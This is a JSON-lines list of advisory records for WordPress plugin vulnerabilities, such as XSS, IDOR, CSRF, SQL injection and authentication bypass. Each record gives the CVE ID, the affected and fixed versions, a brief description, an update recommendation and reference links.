{"CVE_ID":"CVE-2024-10696","slug":"ultraaddons-elementor-lite","versionImpact":"1.1.8","versionEndExcluding":"1.1.9","description":"The UltraAddons \u2013 Elementor Addons (Header Footer Builder, Custom Font, Custom CSS,Woo Widget, Menu Builder, Anywhere Elementor Shortcode) plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.8 via the show_template due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to expose the contents of draft, private, and pending posts.","recommendation":"Update to version 1.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/wp\\\/shortcode.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/wp\\\/shortcode.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/719de6e5-29c5-4303-981d-81840939a0b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/719de6e5-29c5-4303-981d-81840939a0b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2325","slug":"wp-test-email","versionImpact":"1.1.8","versionEndExcluding":"1.1.9","description":"The WP Test Email plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Email Logs in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251086%40wp-test-email&new=3251086%40wp-test-email&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251086%40wp-test-email&new=3251086%40wp-test-email&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a0a9ff8-ed93-4de9-ba49-730b2253c6a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a0a9ff8-ed93-4de9-ba49-730b2253c6a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13832","slug":"ut-elementor-addons-lite","versionImpact":"1.1.8","versionEndExcluding":"1.1.9","description":"The Ultra Addons Lite for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.8 via the 'ut_elementor' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ut-elementor-addons-lite\\\/trunk\\\/includes\\\/queries.php#L506\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ut-elementor-addons-lite\\\/trunk\\\/includes\\\/queries.php#L506\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476883a8-c258-477b-99d3-f35423d7a312?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476883a8-c258-477b-99d3-f35423d7a312?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125101","slug":"portfolio-gallery","versionImpact":"1.1.8","versionEndExcluding":"1.1.9","description":"A vulnerability classified as critical has been found in Portfolio Gallery Plugin up to 1.1.8 on WordPress. This affects an unknown part. The manipulation leads to sql injection. It is possible to initiate the attack remotely. Upgrading to version 1.1.9 is able to address this issue. The name of the patch is 58ed88243e17df766036f4857041edaf358076d3. It is recommended to upgrade the affected component. The identifier VDB-230085 was assigned to this vulnerability.","recommendation":"Update to version 1.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230085\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230085\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230085\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230085\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/portfolio-gallery\\\/commit\\\/58ed88243e17df766036f4857041edaf358076d3\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/portfolio-gallery\\\/commit\\\/58ed88243e17df766036f4857041edaf358076d3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4795","slug":"testimonial-slider-shortcode","versionEndExcluding":"1.1.9","description":"The Testimonial Slider Shortcode WordPress plugin before 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin","recommendation":"Update to version 1.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8390b4a-b43f-4bf6-a61b-dfcbc7b2e7a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8390b4a-b43f-4bf6-a61b-dfcbc7b2e7a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3667","slug":"bit-assist","versionEndExcluding":"1.1.9","description":"The Bit Assist WordPress plugin before 1.1.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f2f3f85-6812-46b5-9175-c56f6852afd7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f2f3f85-6812-46b5-9175-c56f6852afd7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4674","slug":"ibtana-visual-editor","versionEndExcluding":"1.1.8.8","description":"The Ibtana WordPress plugin before 1.1.8.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eda64678-81ae-4be3-941e-a1e26e54029b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eda64678-81ae-4be3-941e-a1e26e54029b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12328","slug":"mas-addons-for-elementor","versionImpact":"1.1.7","versionEndExcluding":"1.1.8","description":"The MAS Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212434%40mas-addons-for-elementor&new=3212434%40mas-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212434%40mas-addons-for-elementor&new=3212434%40mas-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01ccc7b8-3dd4-4b83-bd53-687f7479b214?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01ccc7b8-3dd4-4b83-bd53-687f7479b214?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11901","slug":"embed-power-bi-reports","versionImpact":"1.1.7","versionEndExcluding":"1.1.8","description":"The PowerBI Embed Reports plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'MO_API_POWER_BI' shortcode in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-power-bi-reports\\\/tags\\\/1.1.7\\\/Controller\\\/powerBIConfig.php#L306\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-power-bi-reports\\\/tags\\\/1.1.7\\\/Controller\\\/powerBIConfig.php#L306\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62aa119-98bc-485e-92f2-43bf21756ebd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62aa119-98bc-485e-92f2-43bf21756ebd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7350","slug":"bookingpress-appointment-booking","versionImpact":"1.1.7","versionEndExcluding":"1.1.8","description":"The Appointment Booking Calendar Plugin and Online Scheduling Plugin \u2013 BookingPress plugin for WordPress is vulnerable to authentication bypass in versions 1.1.6 to 1.1.7. This is due to the plugin not properly verifying a user's identity prior to logging them in when completing a booking. This makes it possible for unauthenticated attackers to log in as registered users, including administrators, if they have access to that user's email.  This is only exploitable when the 'Auto login user after successful booking' setting is enabled.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c367565-75f7-4dd7-a2f1-111df581bd7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c367565-75f7-4dd7-a2f1-111df581bd7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_customers.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_customers.php#L339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130266\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_customers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130266\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_customers.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1088","slug":"wp-plugin-manager","versionEndExcluding":"1.1.8","description":"The WP Plugin Manager WordPress plugin before 1.1.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a956f1cd-fce4-4235-b1af-4b7675a60ca2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a956f1cd-fce4-4235-b1af-4b7675a60ca2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2011-10004","slug":"reciply","versionImpact":"1.1.7","versionEndExcluding":"1.1.8","description":"A vulnerability was found in reciply Plugin up to 1.1.7 on WordPress. It has been rated as critical. This issue affects some unknown processing of the file uploadImage.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. Upgrading to version 1.1.8 is able to address this issue. The identifier of the patch is e3ff616dc08d3aadff9253f1085e13f677d0c676. It is recommended to upgrade the affected component. The identifier VDB-242189 was assigned to this vulnerability.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/reciply\\\/commit\\\/e3ff616dc08d3aadff9253f1085e13f677d0c676\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/reciply\\\/commit\\\/e3ff616dc08d3aadff9253f1085e13f677d0c676\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.242189\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.242189\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.242189\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.242189\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8664","slug":"wp-test-email","versionImpact":"1.1.7","versionEndExcluding":"1.1.8","description":"The WP Test Email plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70c1ee04-cfb1-4819-95ab-497e814da16f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70c1ee04-cfb1-4819-95ab-497e814da16f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-test-email\\\/tags\\\/1.1.7\\\/wp-test-email.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-test-email\\\/tags\\\/1.1.7\\\/wp-test-email.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150538%40wp-test-email&new=3150538%40wp-test-email&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150538%40wp-test-email&new=3150538%40wp-test-email&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6953","slug":"fluentforms-pdf","versionImpact":"1.1.7","versionEndExcluding":"1.1.8","description":"The PDF Generator For Fluent Forms \u2013 The Contact Form Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the header, PDF body and footer content parameters in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6675c48-43d4-4394-a4a3-f753bdaa5c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6675c48-43d4-4394-a4a3-f753bdaa5c4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023486%40fluentforms-pdf%2Ftrunk&old=2929799%40fluentforms-pdf%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023486%40fluentforms-pdf%2Ftrunk&old=2929799%40fluentforms-pdf%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50415","slug":"app-ads-txt","versionImpact":"1.1.7.1","versionEndExcluding":"1.1.8","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pagup Ads.Txt & App-ads.Txt Manager for WordPress allows Stored XSS.This issue affects Ads.Txt & App-ads.Txt Manager for WordPress: from n\/a through 1.1.7.1.","recommendation":"Update to version 1.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/app-ads-txt\\\/wordpress-ads-txt-app-ads-txt-manager-for-wordpress-plugin-1-1-7-1-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/app-ads-txt\\\/wordpress-ads-txt-app-ads-txt-manager-for-wordpress-plugin-1-1-7-1-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12340","slug":"animation-addons-for-elementor","versionImpact":"1.1.6","versionEndExcluding":"1.1.7","description":"The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the 'render' function in widgets\/content-slider.php and widgets\/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 1.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205250\\\/animation-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205250\\\/animation-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a0136e2-97f5-4368-a805-0f60d1b8ad11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a0136e2-97f5-4368-a805-0f60d1b8ad11?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13904","slug":"platformly-for-woocommerce","versionImpact":"1.1.6","versionEndExcluding":"1.1.7","description":"The Platform.ly for WooCommerce plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 1.1.6 via the 'hooks' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/platformly-for-woocommerce\\\/trunk\\\/platformly-for-woocommerce.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/platformly-for-woocommerce\\\/trunk\\\/platformly-for-woocommerce.php#L167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249460\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249460\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/944e4c96-6ded-4483-9eaf-d976646f45ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/944e4c96-6ded-4483-9eaf-d976646f45ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11779","slug":"wip-woocarousel-lite","versionImpact":"1.1.6","versionEndExcluding":"1.1.7","description":"The WIP WooCarousel Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wip_woocarousel_products_carousel' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wip-woocarousel-lite\\\/trunk\\\/shortcode\\\/products_carousel.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wip-woocarousel-lite\\\/trunk\\\/shortcode\\\/products_carousel.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199039\\\/wip-woocarousel-lite\\\/trunk\\\/shortcode\\\/products_carousel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199039\\\/wip-woocarousel-lite\\\/trunk\\\/shortcode\\\/products_carousel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wip-woocarousel-lite\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wip-woocarousel-lite\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22298","slug":"hive-support","versionImpact":"1.1.6","versionEndExcluding":"1.1.7","description":"Missing Authorization vulnerability in Hive Support Hive Support \u2013 WordPress Help Desk allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hive Support \u2013 WordPress Help Desk: from n\/a through 1.1.6.","recommendation":"Update to version 1.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hive-support\\\/vulnerability\\\/wordpress-hive-support-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hive-support\\\/vulnerability\\\/wordpress-hive-support-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12443","slug":"support-x","versionImpact":"1.1.6","versionEndExcluding":"1.1.7","description":"The CRM Perks \u2013 WordPress HelpDesk Integration \u2013 Zendesk, Freshdesk, HelpScout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'crm-perks-tickets' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/support-x\\\/trunk\\\/support-x.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/support-x\\\/trunk\\\/support-x.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207849\\\/support-x\\\/trunk\\\/support-x.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207849\\\/support-x\\\/trunk\\\/support-x.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-x\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-x\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a19e11e7-faa1-4e4d-87de-2454c4ad70f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a19e11e7-faa1-4e4d-87de-2454c4ad70f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24652","slug":"local-sync","versionImpact":"1.1.6","versionEndExcluding":"1.1.7","description":"Missing Authorization vulnerability in Revmakx WP Duplicate \u2013 WordPress Migration Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Duplicate \u2013 WordPress Migration Plugin: from n\/a through 1.1.6.","recommendation":"Update to version 1.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/local-sync\\\/vulnerability\\\/wordpress-wp-duplicate-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/local-sync\\\/vulnerability\\\/wordpress-wp-duplicate-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12560","slug":"button-block","versionImpact":"1.1.5","versionEndExcluding":"1.1.6","description":"The Button Block \u2013 Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.","recommendation":"Update to version 1.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208482\\\/button-block\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208482\\\/button-block\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6225","slug":"ameliabooking","versionImpact":"7.5.1","versionEndExcluding":"1.1.6","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.5 (and 7.5.1 for the Pro version) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to one of the following versions, or a newer patched version: 1.1.6, 7.6","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04597908-7086-4158-ae2b-8aa634a217c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04597908-7086-4158-ae2b-8aa634a217c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3092932%40ameliabooking&new=3092932%40ameliabooking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3092932%40ameliabooking&new=3092932%40ameliabooking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0497","slug":"ht-portfolio","versionEndExcluding":"1.1.6","description":"The HT Portfolio WordPress plugin before 1.1.6 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae5b7776-9d0d-4db8-81c3-237b16cd9c62\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae5b7776-9d0d-4db8-81c3-237b16cd9c62\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0484","slug":"ht-contactform","versionEndExcluding":"1.1.6","description":"The Contact Form 7 Widget For Elementor Page Builder & Gutenberg Blocks WordPress plugin before 1.1.6 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e61fb245-0d7f-42b0-9b96-c17ade8c04c5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e61fb245-0d7f-42b0-9b96-c17ade8c04c5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
